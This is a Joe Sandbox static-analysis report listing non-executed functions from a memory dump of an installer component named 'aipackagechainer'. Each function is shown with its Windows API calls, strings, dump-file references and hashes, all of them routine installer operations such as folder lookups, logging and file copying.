Opcode ID: 084245f25598a959c76439c7658d5c5d2959c195025d72cc91f704bbfedebc6c
Instruction ID: f8c1e687f6af3d6544c37d558adc297bbb58de9dbc9f80d7d4a1a0b4e7eb34a4
Opcode Fuzzy Hash: 084245f25598a959c76439c7658d5c5d2959c195025d72cc91f704bbfedebc6c
Instruction Fuzzy Hash: 46F0A73164864CFFC711DF54DC01F5ABBA9F704B10F10462EF91587AA0DB76AA11CA84

Non-executed Functions

Function 0008FD80 Relevance: 49.8, APIs: 11, Strings: 17, Instructions: 814libraryloaderCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(?,?,?,?,?,SystemFolder,0000000C), ref: 0008FF65
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00090069
GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D), ref: 00090170

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D), ref: 0009027D
GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D), ref: 000903EC

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

SHGetSpecialFolderLocation.SHELL32(00000000,0000000D,WindowsVolume,0000000D), ref: 000904D2
LoadLibraryW.KERNEL32(shfolder.dll), ref: 00090560
GetProcAddress.KERNEL32(?,SHGetFolderPathW), ref: 00090592
GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104), ref: 00090770
SHGetPathFromIDListW.SHELL32(?,?), ref: 000907E9
SHGetMalloc.SHELL32(00000000), ref: 00090802

Strings

System32Folder, xrefs: 0008FFC5, 0008FFDA, 0008FFE4
SETUPEXEDIR, xrefs: 00090392
AppDataFolder, xrefs: 000906D5, 00090715
ProgramFiles64Folder, xrefs: 0008FDBA
ProgramW6432, xrefs: 0008FE15
TempFolder, xrefs: 000902BA
SystemFolder, xrefs: 0008FEB6, 0008FECB, 0008FED5
WindowsFolder, xrefs: 000900D5, 000900EA, 000900F4
APPDATA, xrefs: 00090767, 0009076F
SHGetFolderPathW, xrefs: 0009058C
WindowsVolume, xrefs: 000901E4, 000901F9, 00090203
Shell32.dll, xrefs: 000905FA
shfolder.dll, xrefs: 0009055B
ProgramFilesFolder, xrefs: 0009068F
PROGRAMFILES, xrefs: 0009074D
Shlwapi.dll, xrefs: 000905CA
ProgramFiles, xrefs: 000906C3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Directory$FolderPathWindows$AddressEnvironmentFileFindFromHeapLibraryListLoadLocationMallocModuleNameProcProcessResourceSpecialSystemVariable
String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFiles64Folder$ProgramFilesFolder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$Shell32.dll$Shlwapi.dll$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
API String ID: 700146523-2261365735
Opcode ID: 0b19073670840a47fcf5533028e560c7026b341b261457387579d719393d61f7
Instruction ID: 9702283dab4d7b7bcc8c72347410f2b846f39f510049f215d62b0f6c60239179
Opcode Fuzzy Hash: 0b19073670840a47fcf5533028e560c7026b341b261457387579d719393d61f7
Instruction Fuzzy Hash: 00520671A002059FDF64DF24CC45BBAB3B6FF50714F5442A8D9469B2A1EB32DE81DB90

Function 00088880 Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 517fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00129B20,C0000000,00000003,00000000,00000004,00000080,00000000,D11C52E5,00129AFC,00129B14,D11C52E5), ref: 00088900
GetLastError.KERNEL32 ref: 0008891D
OutputDebugStringW.KERNEL32(00000000,00000020), ref: 00088996
OutputDebugStringW.KERNEL32(00000000,?,0000001C), ref: 00088A9A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0000001C), ref: 00088B0B
WriteFile.KERNEL32(00000000,001298F4,00000000,000000FF,00000000,?,0000001C), ref: 00088B3B
WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,0010C440,00000002), ref: 00088BE6
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088BEF
FlushFileBuffers.KERNEL32(00000000,?,0000001C), ref: 00088B40

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

OutputDebugStringW.KERNEL32(00000000,?,0000001D), ref: 00088CE3
WriteFile.KERNEL32(00000000,00000000,00000002,00000000,00000000,?,0000001D), ref: 00088D69
FlushFileBuffers.KERNEL32(00000000,?,0000001D), ref: 00088D74
WriteFile.KERNEL32(00000000,000885DD,000000FC,000000FF,00000000,0010C440,00000002,?,00000000,CPU: ,00000005), ref: 00088DE8
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088DF1
WriteFile.KERNEL32(00000000,000000B7,?,000000FF,00000000,0010C440,00000002), ref: 00088E76
FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0000001C), ref: 00088E7F

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Strings

LOGGER->failed to create LOG at:, xrefs: 00088951, 00088963, 0008896D
OS Version: %u.%u.%u SP%u (%s) [%s], xrefs: 00088BB6
LOGGER->Creating LOG file at:, xrefs: 00088C8B, 00088C9D, 00088CA7
server, xrefs: 00088B92, 00088B9A
LOGGER->Reusing LOG file at:, xrefs: 00088A42, 00088A54, 00088A5E
CPU: , xrefs: 00088C37, 00088C4D, 00088D7D
x64, xrefs: 00088B80, 00088B8C
x86, xrefs: 00088B77
workstation, xrefs: 00088B8D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushWrite$DebugOutputString$CreateErrorFindHeapLastPointerProcessResource
String ID: CPU: $LOGGER->Creating LOG file at:$LOGGER->Reusing LOG file at:$LOGGER->failed to create LOG at:$OS Version: %u.%u.%u SP%u (%s) [%s]$server$workstation$x64$x86
API String ID: 611875259-1312762833
Opcode ID: ab8775db1e26342354b6978984f1229e3a94b04ae8854790332a2e916af0553f
Instruction ID: 47b5966c6974b870f0603ba8424609d1692269add2320ac2b58a62273ad34468
Opcode Fuzzy Hash: ab8775db1e26342354b6978984f1229e3a94b04ae8854790332a2e916af0553f
Instruction Fuzzy Hash: E312AA70A01609DFEB10DF68CD49BAABBB5FF44314F548268E845AB2E2DB74DD04CB90

Function 000C7DB0 Relevance: 32.6, APIs: 21, Instructions: 1121synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C7E0F
GetLastError.KERNEL32 ref: 000C7E1A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8590
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C85D6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C871A
SetEvent.KERNEL32(?), ref: 000C8794
GetLastError.KERNEL32 ref: 000C87A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B02
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B56
WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 000C8B6F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8B7A
EnterCriticalSection.KERNEL32(?), ref: 000C8C94
LeaveCriticalSection.KERNEL32(?), ref: 000C8D19
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8DB2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C8E06
SetEvent.KERNEL32(?), ref: 000C8E8D
GetLastError.KERNEL32 ref: 000C8EA1
SetEvent.KERNEL32(?), ref: 000C8EB2
GetLastError.KERNEL32 ref: 000C8EC2
SetEvent.KERNEL32(?), ref: 000C8EF4
GetLastError.KERNEL32 ref: 000C8F02

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$ErrorLast$EnterEventLeave$ObjectSingleWait
String ID:
API String ID: 3699643388-0
Opcode ID: fccbb4a8e78c932ba885079e64141279b97f27acb9435c6a5e37a9cf7e99488d
Instruction ID: f63fc3120db15e36ec307ead1673c22c870e0327f0c3317fe50b875e81cf221c
Opcode Fuzzy Hash: fccbb4a8e78c932ba885079e64141279b97f27acb9435c6a5e37a9cf7e99488d
Instruction Fuzzy Hash: E2B2BEB4A087418FD764CF69C580B5FBBE1BF88704F148A2EE99993350EB71A845CF46

Function 00081D00 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 376fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000), ref: 00081D5F
PathIsUNCW.SHLWAPI(00000000,*.*,00000000), ref: 00081E17
FindFirstFileW.KERNEL32(00000000,00000000,*.*,00000000), ref: 00081F6B
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00081F85
GetFullPathNameW.KERNEL32(00000000,00000000,?,00000000), ref: 00081FB8
FindClose.KERNEL32(00000000), ref: 00082027
SetLastError.KERNEL32(0000007B), ref: 00082035
_wcsrchr.LIBVCRUNTIME ref: 0008208B
_wcsrchr.LIBVCRUNTIME ref: 000820AB

Strings

\\?\UNC\, xrefs: 00081E37, 00081EEE
*.*, xrefs: 00081D8A, 00081DE7, 00081DE8
2Wup1Wu, xrefs: 00081F6B
\\?\, xrefs: 00081F01, 00081F56, 00081F5B

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FindPath$CloseFullName_wcsrchr$ErrorFileFirstLast
String ID: 2Wup1Wu$*.*$\\?\$\\?\UNC\
API String ID: 726989864-2365612532
Opcode ID: 8a8111bb6bb5eb062e13a3a5e424abe75164257e84b469809487d7194c593430
Instruction ID: 7a7d6994edbf64f127cff1f1c095db237489ef977354af9cda98da0ece5c2e30
Opcode Fuzzy Hash: 8a8111bb6bb5eb062e13a3a5e424abe75164257e84b469809487d7194c593430
Instruction Fuzzy Hash: 0BD1D370600602DFDB14EF68CC99BAEB7E5FF14314F208628E995DB2E2EB759941CB40

Function 000B1900 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?), ref: 000B192D
GetProcessAffinityMask.KERNEL32(00000000), ref: 000B1934
GetSystemInfo.KERNEL32(?), ref: 000B19B5
GetModuleHandleA.KERNEL32 ref: 000B1A04
GetProcAddress.KERNEL32(00000000), ref: 000B1A0B
GlobalMemoryStatus.KERNEL32(?), ref: 000B1A5B

Strings

, xrefs: 000B1A52
@, xrefs: 000B19FC
kernel32.dll, xrefs: 000B19C4
GlobalMemoryStatusEx, xrefs: 000B19BF

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Process$AddressAffinityCurrentGlobalHandleInfoMaskMemoryModuleProcStatusSystem
String ID: $@$GlobalMemoryStatusEx$kernel32.dll
API String ID: 3120231856-802862622
Opcode ID: da66e89ac4eaefa1238deb81b48239aa6fd2088182b098e87d54579ae0a7b60b
Instruction ID: 1e728a9282cedf464235f1f9a4f2096a51042fdf1903c8c75c94247a9f95625e
Opcode Fuzzy Hash: da66e89ac4eaefa1238deb81b48239aa6fd2088182b098e87d54579ae0a7b60b
Instruction Fuzzy Hash: BB718BB2A083118FD708CF59D89479BB7E5BBC8300F49892DE899C7351E7B4D904CB82

Function 00080A00 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000060,D11C52E5,8007000E,00000000,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080A82
LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080A91
FindResourceW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080AAF
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080AC7

Part of subcall function 0007EDE0: GetLastError.KERNEL32(D11C52E5,00000000,000EBD60,000000FF,?,8007000E), ref: 0007EE02

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000F1735,000000FF), ref: 00080BAA

Strings

Module, xrefs: 00080EF7
Module_Raw, xrefs: 00080F4C
REGISTRY, xrefs: 00080FA0, 00081011

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID: Module$Module_Raw$REGISTRY
API String ID: 328770362-549000027
Opcode ID: 8962b4593e4ebaa96291a0df1d25168d5a025d2a12ab11a90e487d996ae696f8
Instruction ID: a71f6dbc92545f99dffe6bf4aa15af6347d34a175679c6cbfe5cc9ea17e17271
Opcode Fuzzy Hash: 8962b4593e4ebaa96291a0df1d25168d5a025d2a12ab11a90e487d996ae696f8
Instruction Fuzzy Hash: C851E170901249EFDB60EF54C844BEE77F4FF48314F108129FA45AB281DB749A44CBA5

Function 000B2C80 Relevance: 16.5, APIs: 6, Strings: 3, Instructions: 702fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,?), ref: 000B303E
CloseHandle.KERNEL32(00000000), ref: 000B3050
GetLastError.KERNEL32 ref: 000B305A
CloseHandle.KERNEL32(FFFFFFFF), ref: 000B309A

Strings

\, xrefs: 000B2D82
$, xrefs: 000B36B4
NUMBER_OF_PROCESSORS, xrefs: 000B3304

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CloseHandle$CreateErrorFileLast
String ID: $$NUMBER_OF_PROCESSORS$\
API String ID: 3884794734-458196154
Opcode ID: fba1ec4f68979367403de95a18d4e2f336dfd54fc9dfa7bda53ec14ed2da1e68
Instruction ID: d364b83467a241d66cdd07e8fd42bf18391743d4580e18459b294236ca78bd43
Opcode Fuzzy Hash: fba1ec4f68979367403de95a18d4e2f336dfd54fc9dfa7bda53ec14ed2da1e68
Instruction Fuzzy Hash: BC723870900268DBDB24DF68C855BDDBBF0BF04714F1482E9E489A7292DB75AE84DF90

Function 000A3790 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 411COMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

_wcsrchr.LIBVCRUNTIME ref: 000A391D
_wcsrchr.LIBVCRUNTIME ref: 000A3945
GetLogicalDriveStringsW.KERNEL32(00000064,?), ref: 000A399E
GetDriveTypeW.KERNEL32(?), ref: 000A39BA
Wow64DisableWow64FsRedirection.KERNEL32(00000000,00000000), ref: 000A3A41
Wow64RevertWow64FsRedirection.KERNEL32(00000000,00000000), ref: 000A3CA1

Strings

p2Wu3Wu, xrefs: 000A4AD1, 000A4BC2
2Wup1Wu, xrefs: 000A4AA9
]%!, xrefs: 000A3939

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Wow64$DriveRedirection_wcsrchr$DisableHeapLogicalProcessRevertStringsType
String ID: 2Wup1Wu$]%!$p2Wu3Wu
API String ID: 1737443197-2445596722
Opcode ID: d27aa662813c62053f1bb42db05693e6437136551ac9e779a7180730a9b27ce4
Instruction ID: ad725a2220b91e1104f2148d750013be1e91b0e5b80668a1a59ccf750542c6c2
Opcode Fuzzy Hash: d27aa662813c62053f1bb42db05693e6437136551ac9e779a7180730a9b27ce4
Instruction Fuzzy Hash: C6F1B331900659CFDB24DB68CC48BEDF7B5AF05310F0486E9E55AAB292DB749E84CF90

Function 0006C120 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 156windowshutdownCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(D11C52E5,00000000,?,?), ref: 0006C182
MessageBoxW.USER32(00000000,?,00000000,00000044), ref: 0006C18D
GetCurrentProcess.KERNEL32 ref: 0006C241
OpenProcessToken.ADVAPI32(00000000,00000028,00000000), ref: 0006C24E
CloseHandle.KERNEL32(00000000), ref: 0006C26E
GetLastError.KERNEL32 ref: 0006C2B3
ExitWindowsEx.USER32(00000006,80040002), ref: 0006C2C4
CloseHandle.KERNEL32(00000000), ref: 0006C2E4

Strings

SeShutdownPrivilege, xrefs: 0006C283

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CloseHandleProcess$CurrentErrorExitForegroundLastMessageOpenTokenWindowWindows
String ID: SeShutdownPrivilege
API String ID: 1440564136-3733053543
Opcode ID: 35096a31da82d46ef6e43caa3276be28c0ad215d9ecb0a2e139682101161ef06
Instruction ID: d60244e1ab28bf2fac2367965fc124099d349d26443cc9b33c2d8fae4b2289db
Opcode Fuzzy Hash: 35096a31da82d46ef6e43caa3276be28c0ad215d9ecb0a2e139682101161ef06
Instruction Fuzzy Hash: 2E515370901245DBEB10DFA8C948B9EBBF5EF49720F248259E815BB2D1DB749D44CB60

Function 0008BAA0 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 556COMMON

Download Yara Rule

APIs

Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881

GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0008BE7A
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0008BE81
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0008BE95
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BE9C

Strings

Error, xrefs: 0008C15C

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ConsoleCriticalHandleSection$AttributeBufferEnterInfoLeaveScreenText
String ID: Error
API String ID: 2673574109-2619118453
Opcode ID: be160a890efa86710e940332030daab6b8fa03a5cf784028ccb66329de02da1f
Instruction ID: 1a0604f9db2ddc04d5e62bce0d69807c69a9a2a6ca3e9152579d2757852c2d46
Opcode Fuzzy Hash: be160a890efa86710e940332030daab6b8fa03a5cf784028ccb66329de02da1f
Instruction Fuzzy Hash: A6429B70D0021ADFEB24DFA8CC44BEDBBB1BF44314F1042A9E459A7692E7746A85CF90

Function 0008CD60 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 348fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,D11C52E5,00000000,00000000,?), ref: 0008CDBB
GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 0008CF24
Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 0008CFC4
CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 0008CFE6
Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 0008D06F
DeleteFileW.KERNEL32(?,D11C52E5,00000000,00000000,000EBBB0,000000FF,?,80004005,?), ref: 0008D17D

Strings

shim_clone, xrefs: 0008CF1E
p1Wu, xrefs: 0008D17D

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Wow64$File$Redirection$CopyDeleteDisableFolderNamePathRevertTemp
String ID: p1Wu$shim_clone
API String ID: 3507832535-294939748
Opcode ID: 930c00ed0acd177ea0cc472180bdf73ff9ef43b95dd1df5cbb3781fb02175762
Instruction ID: f75285a887b0e970898c72a35429c0fcbb06ad146c780835c577d3925fc76dd4
Opcode Fuzzy Hash: 930c00ed0acd177ea0cc472180bdf73ff9ef43b95dd1df5cbb3781fb02175762
Instruction Fuzzy Hash: 81C1E170A002549FEB28AB24DC45BBAB7F4FF45300F1441ADE94A97292EB349E45CB64

Function 000A60A0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,-00000010,?,D11C52E5,?,00000000,00000000), ref: 000A614E
FindNextFileW.KERNEL32(?,00000000), ref: 000A6169

Strings

p2Wu3Wu, xrefs: 000A6169, 000A65CA, 000A6644
2Wup1Wu, xrefs: 000A614E, 000A65A6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileFind$FirstNext
String ID: 2Wup1Wu$p2Wu3Wu
API String ID: 1690352074-4124002120
Opcode ID: 954b6b59d39256aab3792428e5e628e5a7745a8ebca020b026e5660cf060c2fe
Instruction ID: fbfa105b07a52103663b3cc1cded37c0a36342b6db1da6933ecaf258812ef61f
Opcode Fuzzy Hash: 954b6b59d39256aab3792428e5e628e5a7745a8ebca020b026e5660cf060c2fe
Instruction Fuzzy Hash: 70814971D00648DFDB10DFA8CC48AEEBBF8FF09314F188159E815AB291DB759A44CBA1

Function 0008B990 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 459COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?), ref: 0008BE7A
GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 0008BE81
GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 0008BE95
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BE9C
GetStdHandle.KERNEL32(000000F5,?,?,00000000,?,00000000,0010C440,00000002,?,?), ref: 0008BF2B
SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 0008BF32

Strings

*** Stack Trace (x86) ***, xrefs: 0008B9E5

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ConsoleHandle$AttributeText$BufferInfoScreen
String ID: *** Stack Trace (x86) ***
